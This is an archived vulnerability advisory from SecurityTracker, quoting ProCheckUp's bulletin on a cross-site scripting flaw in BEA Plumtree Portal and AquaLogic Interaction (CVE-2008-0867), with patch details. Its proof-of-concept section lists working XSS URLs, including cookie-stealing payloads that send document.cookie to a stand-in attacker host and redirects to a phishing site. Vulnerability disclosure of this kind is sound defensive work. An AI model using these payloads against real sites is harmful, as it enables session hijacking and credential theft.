SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Plumtree Vendors:   BEA Systems
Plumtree Portal Input Validation Errors Permit Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1019440
SecurityTracker URL:  http://securitytracker.com/id/1019440
CVE Reference:   CVE-2008-0867   (Links to External Site)
Updated:  Mar 14 2008
Original Entry Date:  Feb 19 2008
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 6.0
Description:   A vulnerability was reported in Plumtree Portal and AquaLogic Interaction. A remote user can conduct cross-site scripting attacks.

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Plumtree software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit URLs are provided:

https://[target]/portal/server.pt?open=space&name=</SCRIPT><script>alert('CanCrossSiteScript')</script>
https://[target]/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--

The vendor was notified on May 18, 2007.

BEA AquaLogic Interaction is also affected.

Jan Fry and Adrian Pastor of ProCheckUp Ltd reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Plumtree software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a patch (Plumtree Foundation 6.0.1.316111, AquaLogic Interaction 6.1.1.316115).

The BEA advisory is available at:

http://dev2dev.bea.com/pub/advisory/259

Vendor URL:  dev2dev.bea.com/pub/advisory/259 (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Red Hat Enterprise), Linux (SuSE), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (2003)

Message History:   None.


 Source Message Contents

Subject:  PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction

PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals


Description:

BEA Plumtree Foundation portal 6.0 and BEA AquaLogic Interaction 6.1 are 
vulnerable to a XSS vulnerability affecting the 'name' parameter which 
is submitted to the '/portal/server.pt' server-side script.

Date found: 12th September 2006

Vendor contacted: 18th May 2007

Successfully tested on: BEA Plumtree Foundation 6.0.1.218452.

BEA Systems have confirmed the following versions to be affected:

BEA Plumtree Foundation 6.0 through service pack 1.
BEA AquaLogic Interaction 6.1 through service pack 1.

BEA Plumtree 5.0J.173033, 5.02, 5.03 and 5.4 are not affected by this issue.


Severity: Medium-High


Authors: Jan Fry and Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)

ProCheckUp thanks BEA Systems for their co-operation.

Proof of concept:

The following requests launch a JavaScript alert box on the user's web 
browser, simply to prove that is possible to run scripting code on the 
victim's web browser.

Please note that '%22;}%3C/script%3E' is added at the beginning of every 
payload in order to make the overall HTML document syntactically 
correct, thus increasing the chance of the attack working on different 
web browser types:

https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>alert('CanCrossSiteScript')</script>
https://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--


The following requests allow session hijacking through cookie theft:

https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie</script>
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--

The following requests allow password theft by redirecting to a 
third-party 'spoof' site which would perform a phishing attack on the 
victim:

https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://phishers-site.foo"</script>
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://phishers-site.foo%3C/script%3E%3C!--

HTML injection through this XSS vulnerability is also possible. This 
allows advanced phishing attacks by inserting a HTML form within the 
context of the victim website.


Consequences:

Scripting code can be run within the security context of the target 
site. User accounts can be hijacked. Advanced phishing attacks can be 
launched.


Note:

This vulnerability could be considered a medium-high risk (rather than 
medium risk) in cases in which admin users are targeted, resulting in 
the attacker gaining administrative privileges on the target 
Plumtree/AquaLogic Portal.


Fix: this issue will be addressed in the 6.5 release of AquaLogic 
Interaction.


References:

"ProCheckUp - Security Vulnerabilities"
http://www.procheckup.com/Vulnerabilities.php

BEA's BEA08-186.00 advisory:

"Security Advisories and Notifications"
http://dev2dev.bea.com/advisoriesnotifications/


Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the 
Internet community for the purpose of alerting them to problems, if and 
only if, the Bulletin is not edited or changed in any way, is attributed 
to Procheckup, and provided such reproduction and/or distribution is 
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not 
liable for any misuse  of this information by any third party.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC